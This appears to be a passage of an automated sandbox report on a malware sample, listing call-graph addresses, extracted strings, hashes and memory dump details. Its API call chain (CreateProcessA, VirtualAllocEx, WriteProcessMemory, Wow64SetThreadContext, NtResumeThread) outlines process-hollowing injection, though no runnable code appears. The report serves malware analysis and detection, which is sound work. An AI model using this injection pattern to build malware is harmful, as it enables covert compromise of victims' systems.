54558->54572 54559->54554 54563 5a9b845 54562->54563 54564 5a9b85b 54563->54564 54565 5a9bb48 10 API calls 54563->54565 54566 5a9be06 10 API calls 54563->54566 54564->54554 54565->54564 54566->54564 54569 5a9bb57 54567->54569 54568 5a9b8cd 54568->54559 54569->54568 54577 5a9cc38 54569->54577 54583 5a9cc2a 54569->54583 54573 5a9b8cd 54572->54573 54574 5a9bc1a 54572->54574 54573->54559 54575 5a9cc38 10 API calls 54574->54575 54576 5a9cc2a 10 API calls 54574->54576 54575->54573 54576->54573 54578 5a9cc4d 54577->54578 54589 5a9cc79 54578->54589 54593 5a9cf85 54578->54593 54597 5a9cc88 54578->54597 54579 5a9cc6f 54579->54568 54584 5a9cc38 54583->54584 54586 5a9cc79 10 API calls 54584->54586 54587 5a9cc88 10 API calls 54584->54587 54588 5a9cf85 10 API calls 54584->54588 54585 5a9cc6f 54585->54568 54586->54585 54587->54585 54588->54585 54591 5a9ccb5 54589->54591 54590 5a9cd48 54590->54579 54591->54590 54601 5a9d3b1 54591->54601 54595 5a9cced 54593->54595 54594 5a9cd48 54594->54579 54595->54594 54596 5a9d3b1 10 API calls 54595->54596 54596->54595 54599 5a9ccb5 54597->54599 54598 5a9cd48 54598->54579 54599->54598 54600 5a9d3b1 10 API calls 54599->54600 54600->54599 54602 5a9d3d5 54601->54602 54615 5a9dc2e 54602->54615 54619 5a9dcbd 54602->54619 54623 5a9d98d 54602->54623 54628 5a9d8da 54602->54628 54633 5a9e338 54602->54633 54638 5a9daa7 54602->54638 54642 5a9e227 54602->54642 54647 5a9e585 54602->54647 54652 5a9df52 54602->54652 54657 5a9de13 54602->54657 54662 5a9dbd1 54602->54662 54616 5a9dc3c 54615->54616 54667 5aafee0 54616->54667 54672 5aafed0 54616->54672 54620 5a9dc58 54619->54620 54620->54619 54621 5aafee0 2 API calls 54620->54621 54622 5aafed0 2 API calls 54620->54622 54621->54620 54622->54620 54624 5a9e24d 54623->54624 54625 5a9d48b 54623->54625 54685 5a92a29 54624->54685 54689 5a92a30 54624->54689 54629 5a9d8f7 54628->54629 54693 5a92818 54629->54693 54697 5a92811 54629->54697 54630 5a9d945 54634 5a9d48b 54633->54634 54635 5a9dc32 54633->54635 54636 5aafee0 2 API calls 54635->54636 54637 5aafed0 2 API calls 54635->54637 54636->54635 54637->54635 54701 5a92158 54638->54701 54705 5a92150 54638->54705 54639 5a9dac1 54643 5a9e231 54642->54643 54645 5a92a29 NtResumeThread 54643->54645 54646 5a92a30 NtResumeThread 54643->54646 54644 5a9d48b 54645->54644 54646->54644 54648 5a9e59d 54647->54648 54650 5a92818 WriteProcessMemory 54648->54650 54651 5a92811 WriteProcessMemory 54648->54651 54649 5a9d48b 54650->54649 54651->54649 54653 5a9df78 54652->54653 54655 5a92818 WriteProcessMemory 54653->54655 54656 5a92811 WriteProcessMemory 54653->54656 54654 5a9d48b 54655->54654 54656->54654 54658 5a9e0a6 54657->54658 54659 5a9d48b 54657->54659 54660 5a92158 Wow64SetThreadContext 54658->54660 54661 5a92150 Wow64SetThreadContext 54658->54661 54660->54659 54661->54659 54663 5a9dbe9 54662->54663 54709 5a9ea60 54663->54709 54713 5a9ea52 54663->54713 54664 5a9dc01 54668 5aafef5 54667->54668 54677 5a926b8 54668->54677 54681 5a926b0 54668->54681 54669 5aaff17 54669->54616 54673 5aafee0 54672->54673 54675 5a926b8 VirtualAllocEx 54673->54675 54676 5a926b0 VirtualAllocEx 54673->54676 54674 5aaff17 54674->54616 54675->54674 54676->54674 54678 5a926fc VirtualAllocEx 54677->54678 54680 5a92774 54678->54680 54680->54669 54682 5a926bd VirtualAllocEx 54681->54682 54684 5a92774 54682->54684 54684->54669 54686 5a92a35 NtResumeThread 54685->54686 54688 5a92ad0 54686->54688 54688->54625 54690 5a92a79 NtResumeThread 54689->54690 54692 5a92ad0 54690->54692 54692->54625 54694 5a92864 WriteProcessMemory 54693->54694 54696 5a928fd 54694->54696 54696->54630 54698 5a9281d WriteProcessMemory 54697->54698 54700 5a928fd 54698->54700 54700->54630 54702 5a921a1 Wow64SetThreadContext 54701->54702 54704 5a92219 54702->54704 54704->54639 54706 5a9215d Wow64SetThreadContext 54705->54706 54708 5a92219 54706->54708 54708->54639 54710 5a9ea77 54709->54710 54711 5a9ea99 54710->54711 54717 5a9eb8b 54710->54717 54711->54664 54714 5a9ea77 54713->54714 54715 5a9eb8b 2 API calls 54714->54715 54716 5a9ea99 54714->54716 54715->54716 54716->54664 54718 5a9eb92 54717->54718 54722 5a91da0 54718->54722 54726 5a91d94 54718->54726 54719 5a9eb4e 54724 5a91e20 CreateProcessA 54722->54724 54725 5a9201c 54724->54725 54727 5a91da0 CreateProcessA 54726->54727 54729 5a9201c 54727->54729

                          Executed Functions

                          Function 0221D2D0 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 718 221d2d0-221d2f1 719 221d2f3 718->719 720 221d2f8-221d3df 718->720 719->720 722 221dae1-221db09 720->722 723 221d3e5-221d526 call 2219508 720->723 726 221e20f-221e218 722->726 769 221daaa-221dad4 723->769 770 221d52c-221d587 723->770 728 221db17-221db21 726->728 729 221e21e-221e235 726->729 730 221db23 728->730 731 221db28-221dc1c call 2219508 728->731 730->731 752 221dc46 731->752 753 221dc1e-221dc2a 731->753 756 221dc4c-221dc6c 752->756 754 221dc34-221dc3a 753->754 755 221dc2c-221dc32 753->755 757 221dc44 754->757 755->757 760 221dccc-221dd4c 756->760 761 221dc6e-221dcc7 756->761 757->756 783 221dda3-221dde6 call 2219508 760->783 784 221dd4e-221dda1 760->784 775 221e20c 761->775 780 221dad6 769->780 781 221dade 769->781 777 221d589 770->777 778 221d58c-221d597 770->778 775->726 777->778 782 221d9bf-221d9c5 778->782 780->781 781->722 786 221d9cb-221da47 call 2213378 782->786 787 221d59c-221d5ba 782->787 808 221ddf1-221ddfa 783->808 784->808 829 221da94-221da9a 786->829 789 221d611-221d626 787->789 790 221d5bc-221d5c0 787->790 792 221d628 789->792 793 221d62d-221d643 789->793 790->789 794 221d5c2-221d5cd 790->794 792->793 798 221d645 793->798 799 221d64a-221d661 793->799 800 221d603-221d609 794->800 798->799 805 221d663 799->805 806 221d668-221d67e 799->806 803 221d60b-221d60c 800->803 804 221d5cf-221d5d3 800->804 807 221d68f-221d6fa 803->807 809 221d5d5 804->809 810 221d5d9-221d5f1 804->810 805->806 811 221d680 806->811 812 221d685-221d68c 806->812 814 221d6fc-221d708 807->814 815 221d70e-221d8c3 807->815 817 221de5a-221de69 808->817 809->810 818 221d5f3 810->818 819 221d5f8-221d600 810->819 811->812 812->807 814->815 827 221d8c5-221d8c9 815->827 828 221d927-221d93c 815->828 820 221de6b-221def3 817->820 821 221ddfc-221de24 817->821 818->819 819->800 856 221e06c-221e078 820->856 824 221de26 821->824 825 221de2b-221de54 821->825 824->825 825->817 827->828 830 221d8cb-221d8da 827->830 834 221d943-221d964 828->834 835 221d93e 828->835 832 221da49-221da91 829->832 833 221da9c-221daa2 829->833 839 221d919-221d91f 830->839 832->829 833->769 836 221d966 834->836 837 221d96b-221d98a 834->837 835->834 836->837 840 221d991-221d9b1 837->840 841 221d98c 837->841 843 221d921-221d922 839->843 844 221d8dc-221d8e0 839->844 849 221d9b3 840->849 850 221d9b8 840->850 841->840 851 221d9bc 843->851 847 221d8e2-221d8e6 844->847 848 221d8ea-221d90b 844->848 847->848 852 221d912-221d916 848->852 853 221d90d 848->853 849->850 850->851 851->782 852->839 853->852 858 221def8-221df01 856->858 859 221e07e-221e0d9 856->859 860 221df03 858->860 861 221df0a-221e060 858->861 874 221e110-221e13a 859->874 875 221e0db-221e10e 859->875 860->861 863 221df10-221df50 860->863 864 221df55-221df95 860->864 865 221df9a-221dfda 860->865 866 221dfdf-221e01f 860->866 876 221e066 861->876 863->876 864->876 865->876 866->876 883 221e143-221e1d6 874->883 875->883 876->856 887 221e1dd-221e1fd 883->887 887->775
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJjq$Teeq$piq$xbhq
                          • API String ID: 0-2649575939
                          • Opcode ID: ddf3e34319a20bace7b6bbc3d7f96e49dd9a50e0e31d5762a8e2577cf422c7cb
                          • Instruction ID: 9b8e62f360d1fec73af9c09bcf6094399d732d153e3ad6c2904a75376400f318
                          • Opcode Fuzzy Hash: ddf3e34319a20bace7b6bbc3d7f96e49dd9a50e0e31d5762a8e2577cf422c7cb
                          • Instruction Fuzzy Hash: C7A2C675E00628CFDB64CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40
                          Function 02210D21 Relevance: 3.1, Strings: 2, Instructions: 607COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1663 2210d21-2210da7 1665 2210da9 1663->1665 1666 2210dae-2210dc6 1663->1666 1665->1666 1668 22113c2-22113df 1666->1668 1669 2210dcc-2210fa4 1666->1669 1671 2211463-22114ab 1668->1671 1672 22113e5-2211405 1668->1672 1731 2210fa6-2210fdc 1669->1731 1732 2210fde-2210fe0 1669->1732 1683 22114bd-22114c5 1671->1683 1684 22114ad-22114b8 1671->1684 1677 22116a7 1672->1677 1678 221140b-2211413 1672->1678 1682 22116ac-22116b5 1677->1682 1678->1677 1681 2211419-221142e 1678->1681 1681->1677 1685 2211434-221145e call 2210228 1681->1685 1687 22116c2 1682->1687 1688 22116b7 1682->1688 1690 22114c7-22114e8 1683->1690 1691 22114ea 1683->1691 1689 2211560-22115aa 1684->1689 1685->1682 1697 22116c3 1687->1697 1688->1687 1702 22115b0-22115dc 1689->1702 1703 221163b-22116a5 1689->1703 1695 22114f1-22114f3 1690->1695 1691->1695 1699 22114f5-22114fd 1695->1699 1700 22114ff-221151f 1695->1700 1697->1697 1699->1689 1700->1689 1705 2211521-221152a 1700->1705 1702->1677 1710 22115e2-22115e9 1702->1710 1703->1682 1705->1677 1709 2211530-221155e 1705->1709 1709->1689 1709->1705 1710->1677 1712 22115ef-22115fb 1710->1712 1712->1677 1713 2211601-221160d 1712->1713 1713->1677 1715 2211613-2211639 1713->1715 1715->1682 1731->1732 1733 2210fe2-2210fe4 1732->1733 1734 2210fe6-2210ff0 1732->1734 1735 2210ff2-2211008 1733->1735 1734->1735 1738 221100a-221100c 1735->1738 1739 221100e-2211016 1735->1739 1740 2211018-2211020 1738->1740 1739->1740 1743 2211022-2211031 1740->1743 1744 2211037-221105e 1740->1744 1743->1744 1747 2211060-221106d 1744->1747 1748 221109a-22110a4 1744->1748 1747->1748 1752 221106f-221107c 1747->1752 1749 22110a6 1748->1749 1750 22110ad-2211133 1748->1750 1749->1750 1762 2211135-2211172 1750->1762 1763 2211174-2211182 1750->1763 1756 2211082-2211095 1752->1756 1757 221107e-2211080 1752->1757 1756->1748 1757->1748 1766 221118d-22111c9 1762->1766 1763->1766 1782 22111cf call 2212001 1766->1782 1783 22111cf call 2212010 1766->1783 1770 22111d5-221129b 1775 22112c9-22112e5 1770->1775 1776 221129d-22112b9 1770->1776 1778 22112f3 1775->1778 1779 22112e7 1775->1779 1781 22112c5-22112c7 1776->1781 1778->1668 1779->1778 1781->1775 1781->1776 1782->1770 1783->1770
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 4661aaf809ebc450878eae709b98996239831098d38d52ce91cac0e4d1a30e63
                          • Instruction ID: f152259f130f0436313cc3fa346090083b4dfbcd875e6860bffb00745ca7ae03
                          • Opcode Fuzzy Hash: 4661aaf809ebc450878eae709b98996239831098d38d52ce91cac0e4d1a30e63
                          • Instruction Fuzzy Hash: A9425E74E1151A8FDB14CFA9D884AAEB7F2FF88300F158569D409EB359DB34A981CF90
                          Function 02210D6A Relevance: 2.9, Strings: 2, Instructions: 375COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2016 2210d6a-2210d80 2018 2210d82-2210d8c 2016->2018 2019 2210d8d-2210da7 2016->2019 2018->2019 2020 2210da9 2019->2020 2021 2210dae-2210dc6 2019->2021 2020->2021 2023 22113c2-22113df 2021->2023 2024 2210dcc-2210fa4 2021->2024 2026 2211463-22114ab 2023->2026 2027 22113e5-2211405 2023->2027 2086 2210fa6-2210fdc 2024->2086 2087 2210fde-2210fe0 2024->2087 2038 22114bd-22114c5 2026->2038 2039 22114ad-22114b8 2026->2039 2032 22116a7 2027->2032 2033 221140b-2211413 2027->2033 2037 22116ac-22116b5 2032->2037 2033->2032 2036 2211419-221142e 2033->2036 2036->2032 2040 2211434-221145e call 2210228 2036->2040 2042 22116c2 2037->2042 2043 22116b7 2037->2043 2045 22114c7-22114e8 2038->2045 2046 22114ea 2038->2046 2044 2211560-22115aa 2039->2044 2040->2037 2052 22116c3 2042->2052 2043->2042 2057 22115b0-22115dc 2044->2057 2058 221163b-22116a5 2044->2058 2050 22114f1-22114f3 2045->2050 2046->2050 2054 22114f5-22114fd 2050->2054 2055 22114ff-221151f 2050->2055 2052->2052 2054->2044 2055->2044 2060 2211521-221152a 2055->2060 2057->2032 2065 22115e2-22115e9 2057->2065 2058->2037 2060->2032 2064 2211530-221155e 2060->2064 2064->2044 2064->2060 2065->2032 2067 22115ef-22115fb 2065->2067 2067->2032 2068 2211601-221160d 2067->2068 2068->2032 2070 2211613-2211639 2068->2070 2070->2037 2086->2087 2088 2210fe2-2210fe4 2087->2088 2089 2210fe6-2210ff0 2087->2089 2090 2210ff2-2211008 2088->2090 2089->2090 2093 221100a-221100c 2090->2093 2094 221100e-2211016 2090->2094 2095 2211018-2211020 2093->2095 2094->2095 2098 2211022-2211031 2095->2098 2099 2211037-221105e 2095->2099 2098->2099 2102 2211060-221106d 2099->2102 2103 221109a-22110a4 2099->2103 2102->2103 2107 221106f-221107c 2102->2107 2104 22110a6 2103->2104 2105 22110ad-2211133 2103->2105 2104->2105 2117 2211135-2211172 2105->2117 2118 2211174-2211182 2105->2118 2111 2211082-2211095 2107->2111 2112 221107e-2211080 2107->2112 2111->2103 2112->2103 2121 221118d-22111c9 2117->2121 2118->2121 2137 22111cf call 2212001 2121->2137 2138 22111cf call 2212010 2121->2138 2125 22111d5-221129b 2130 22112c9-22112e5 2125->2130 2131 221129d-22112b9 2125->2131 2133 22112f3 2130->2133 2134 22112e7 2130->2134 2136 22112c5-22112c7 2131->2136 2133->2023 2134->2133 2136->2130 2136->2131 2137->2125 2138->2125
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 028f48267d525e213deff2ed1e25f373b6cefa47d26faf28c5ca4e42d48789c7
                          • Instruction ID: 248bd5dc2da188bc98f84969bf10fa380c817aedd6ef3b05ec70b1c9ba588ece
                          • Opcode Fuzzy Hash: 028f48267d525e213deff2ed1e25f373b6cefa47d26faf28c5ca4e42d48789c7
                          • Instruction Fuzzy Hash: 77E14F35E1152A8FDB54DF79D880AAEB7F2FF88300F158669D409EB258DB309941CB90
                          Function 02210DE1 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2265 2210de1-2210fa4 2288 2210fa6-2210fdc 2265->2288 2289 2210fde-2210fe0 2265->2289 2288->2289 2290 2210fe2-2210fe4 2289->2290 2291 2210fe6-2210ff0 2289->2291 2292 2210ff2-2211008 2290->2292 2291->2292 2295 221100a-221100c 2292->2295 2296 221100e-2211016 2292->2296 2297 2211018-2211020 2295->2297 2296->2297 2300 2211022-2211031 2297->2300 2301 2211037-221105e 2297->2301 2300->2301 2304 2211060-221106d 2301->2304 2305 221109a-22110a4 2301->2305 2304->2305 2309 221106f-221107c 2304->2309 2306 22110a6 2305->2306 2307 22110ad-2211133 2305->2307 2306->2307 2319 2211135-2211172 2307->2319 2320 2211174-2211182 2307->2320 2313 2211082-2211095 2309->2313 2314 221107e-2211080 2309->2314 2313->2305 2314->2305 2323 221118d-22111c9 2319->2323 2320->2323 2377 22111cf call 2212001 2323->2377 2378 22111cf call 2212010 2323->2378 2327 22111d5-221129b 2332 22112c9-22112e5 2327->2332 2333 221129d-22112b9 2327->2333 2335 22112f3-22113df 2332->2335 2336 22112e7 2332->2336 2338 22112c5-22112c7 2333->2338 2341 2211463-22114ab 2335->2341 2342 22113e5-2211405 2335->2342 2336->2335 2338->2332 2338->2333 2350 22114bd-22114c5 2341->2350 2351 22114ad-22114b8 2341->2351 2345 22116a7 2342->2345 2346 221140b-2211413 2342->2346 2349 22116ac-22116b5 2345->2349 2346->2345 2348 2211419-221142e 2346->2348 2348->2345 2352 2211434-221145e call 2210228 2348->2352 2353 22116c2 2349->2353 2354 22116b7 2349->2354 2356 22114c7-22114e8 2350->2356 2357 22114ea 2350->2357 2355 2211560-22115aa 2351->2355 2352->2349 2362 22116c3 2353->2362 2354->2353 2366 22115b0-22115dc 2355->2366 2367 221163b-22116a5 2355->2367 2360 22114f1-22114f3 2356->2360 2357->2360 2364 22114f5-22114fd 2360->2364 2365 22114ff-221151f 2360->2365 2362->2362 2364->2355 2365->2355 2369 2211521-221152a 2365->2369 2366->2345 2373 22115e2-22115e9 2366->2373 2367->2349 2369->2345 2372 2211530-221155e 2369->2372 2372->2355 2372->2369 2373->2345 2374 22115ef-22115fb 2373->2374 2374->2345 2375 2211601-221160d 2374->2375 2375->2345 2376 2211613-2211639 2375->2376 2376->2349 2377->2327 2378->2327
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: bd50ba7a27f1356534f36d5f7c89dcee1a4054dc40f685c9a05eddcf314c7939
                          • Instruction ID: 4f55cd97dcb1a2ff654e77d520de0e4e71833f8ac61c1ae85e9aebeda6821591
                          • Opcode Fuzzy Hash: bd50ba7a27f1356534f36d5f7c89dcee1a4054dc40f685c9a05eddcf314c7939
                          • Instruction Fuzzy Hash: 57D16D35E1152A8FDB54DF79D880AAEB7F2BFC8300F158669D409EB359DB30A941CB90
                          Function 02218F2B Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2467 2218f2b-2218f2d 2468 2218f2f-2218f31 2467->2468 2469 2218eee 2467->2469 2470 2218ef2-2218ef5 2468->2470 2471 2218f33-2218f52 2468->2471 2469->2470 2472 2218e04-2218e0a 2470->2472 2473 2218ef6-2218f01 2470->2473 2474 2218f54 2471->2474 2475 2218f59-22191de 2471->2475 2476 2218e13-2218e14 2472->2476 2477 2218e0c 2472->2477 2473->2472 2474->2475 2478 2218e16-2218e41 2476->2478 2479 2218e88-2218eb6 2476->2479 2477->2478 2477->2479 2480 2218f06-2218f0c 2477->2480 2481 2218ec9 2477->2481 2482 2218e4b call 5ded348 2477->2482 2478->2472 2494 2218e43-2218e49 2478->2494 2479->2472 2496 2218ebc-2218ec4 2479->2496 2484 2218ecf-2218ee9 2481->2484 2486 2218e51-2218e79 2482->2486 2484->2469 2486->2472 2495 2218e7b-2218e83 2486->2495 2494->2472 2495->2472 2496->2472
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 0ca827bb9a2376edd47642de85409cbeaead2e7d6e287bbebbfd15784c72f048
                          • Instruction ID: 10fb2789d1561f4e4bd17593a30b5464a39942e30b45e8a179bcce1386dc7342
                          • Opcode Fuzzy Hash: 0ca827bb9a2376edd47642de85409cbeaead2e7d6e287bbebbfd15784c72f048
                          • Instruction Fuzzy Hash: 85A128B0E00609CFE748EFAAE8846AEBBF6EFC5304F14C569D405AB269DB741945CF41
                          Function 02212322 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2525 2212322-2212360 2530 2212371 call 2211f30 2525->2530 2531 2212362-2212370 2525->2531 2533 2212376-2212378 2530->2533 2534 2212389-22123a3 2533->2534 2535 221237a-2212388 2533->2535 2537 22123a9-22123b6 2534->2537 2538 221248e-2212516 2534->2538 2537->2538 2539 22123bc-22123c6 2537->2539 2539->2538 2541 22123cc-22123d6 2539->2541 2541->2538 2542 22123dc-22123f6 2541->2542 2544 22123f9-2212417 2542->2544 2544->2538 2545 2212419-221243e 2544->2545 2545->2538 2547 2212440-2212452 2545->2547 2547->2544 2548 2212454-2212456 2547->2548 2550 2212459-221245e 2548->2550 2550->2538 2551 2212460-221246a 2550->2551 2551->2550 2552 221246c-221248d 2551->2552
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: 5308d41988c6602089b825b9de5d22d7126e5bb197f3099400fed9b205bdbb19
                          • Instruction ID: a82233c9bb853667be90aa4f60136385e6f50de32a0f75d913061306621f253d
                          • Opcode Fuzzy Hash: 5308d41988c6602089b825b9de5d22d7126e5bb197f3099400fed9b205bdbb19
                          • Instruction Fuzzy Hash: 8E51C071B101568FCB14CBACD885AAEBBF2EBC8215B158579E509DB349DB30EC518B80
                          Function 05A914F0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A915AD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 12a7f88969c77c0105b0b55a40e77d575f8ba2cc56894d7be7fa284e1d44ca4f
                          • Instruction ID: f2b7e3527795c57109f6609f88bea4b73ded8ffc48fc3ddd7671cbdc2136c0eb
                          • Opcode Fuzzy Hash: 12a7f88969c77c0105b0b55a40e77d575f8ba2cc56894d7be7fa284e1d44ca4f
                          • Instruction Fuzzy Hash: 744197B9D002589FCF10CFAAD980ADEFBB1FB59310F10902AE815B7200D735A941CF64
                          Function 05A914F8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A915AD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: f09759778546b2a7a1a456018d9d91b9cedcbaaa8ff00c14ececcef98f9fe3d5
                          • Instruction ID: 5b81b88bea6dfed9378f787f176168ee76f8e096a20bd78abd544280948f8928
                          • Opcode Fuzzy Hash: f09759778546b2a7a1a456018d9d91b9cedcbaaa8ff00c14ececcef98f9fe3d5
                          • Instruction Fuzzy Hash: C94187B9D002599FCF14CFAAD980ADEFBB5FB59320F10902AE819B7210D735A945CF64
                          Function 05A92A30 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 05A92ABE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: c7b6fa81f1f9a403bdf7a11e3b7616800913a25f67397bfa0e66ae60a35cce9d
                          • Instruction ID: d2ce11c11752e78ec261b11384444d07baff4afe9ca83eafc387e43db3e3277d
                          • Opcode Fuzzy Hash: c7b6fa81f1f9a403bdf7a11e3b7616800913a25f67397bfa0e66ae60a35cce9d
                          • Instruction Fuzzy Hash: C53198B9D012189FCB14CFA9D980A9EFBF5FF49310F14942AE815B7200C735A945CF94
                          Function 05A92A29 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 05A92ABE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 201ca8627da5fe30fce748290dc84dcff1a087ef3aad59c3b1fa90f4be6ba777
                          • Instruction ID: 43d0687b94ebe1a3e872b1f9d54cc87880f2147fd7a13ec5daac40ee627a02c4
                          • Opcode Fuzzy Hash: 201ca8627da5fe30fce748290dc84dcff1a087ef3aad59c3b1fa90f4be6ba777
                          • Instruction Fuzzy Hash: 7D31A8B9D012189FCF14CFA9E980AAEFBF1BF58310F24942AE815B7210D775A945CF94
                          Function 05DEDBE8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dlq
                          • API String ID: 0-3914526553
                          • Opcode ID: 760d5de317316b33e2f6b63083ad04e29fbc90909c36e6936e6c74e1d2f45a5e
                          • Instruction ID: 5cd45f69b126772956e2e8a4ef190aa78753dd7b74fc41e81fa7a0b42da0d09c
                          • Opcode Fuzzy Hash: 760d5de317316b33e2f6b63083ad04e29fbc90909c36e6936e6c74e1d2f45a5e
                          • Instruction Fuzzy Hash: CED19374E01218CFDB54DFA9D994A9DBBB2FF89300F1081AAD409AB365DB31AD81CF50
                          Function 02210A58 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 497e283f582b4e87fbb6a69311adb61af241a8da08383235d7e61226383f4217
                          • Instruction ID: f15d6e97d3032cf71438df1839bdfb06a388570698fbe85e64a5d8c7b9955502
                          • Opcode Fuzzy Hash: 497e283f582b4e87fbb6a69311adb61af241a8da08383235d7e61226383f4217
                          • Instruction Fuzzy Hash: 5F8109B8E5020A9FDF14CFA9D980AAEBBF1BF48314F10A555D416EB294DB319A41CF50
                          Function 02212010 Relevance: .2, Instructions: 235COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6535f4b2fdd662a41f10521d763a51481ba105663cc423b21d4342d97aab5f78
                          • Instruction ID: 33c8dc8b6d9638dd1d1c2b992a7d240488b77122c980412d5c7a96d388bb6902
                          • Opcode Fuzzy Hash: 6535f4b2fdd662a41f10521d763a51481ba105663cc423b21d4342d97aab5f78
                          • Instruction Fuzzy Hash: 0B815F36F206259FC754DBA9D880E9EB7E3AFD8711F1A8164E405DB369DB70AC018B90
                          Function 0221E610 Relevance: 6.6, Strings: 5, Instructions: 345COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
